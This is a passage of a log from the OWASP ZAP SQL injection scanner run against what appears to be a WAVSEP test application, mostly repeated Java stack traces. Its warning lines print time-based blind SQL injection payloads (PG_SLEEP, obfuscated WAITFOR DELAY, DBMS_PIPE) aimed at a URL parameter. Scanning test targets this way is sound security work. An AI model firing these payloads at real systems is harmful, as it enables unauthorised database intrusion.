org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679283 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679284 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679284 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679285 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679286 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679286 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679288 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679288 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679289 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679290 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679291 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679291 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(113)||CHR(76)||CHR(67),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(113)||CHR(76)||CHR(67),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679292 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');WAITFOR DELAY 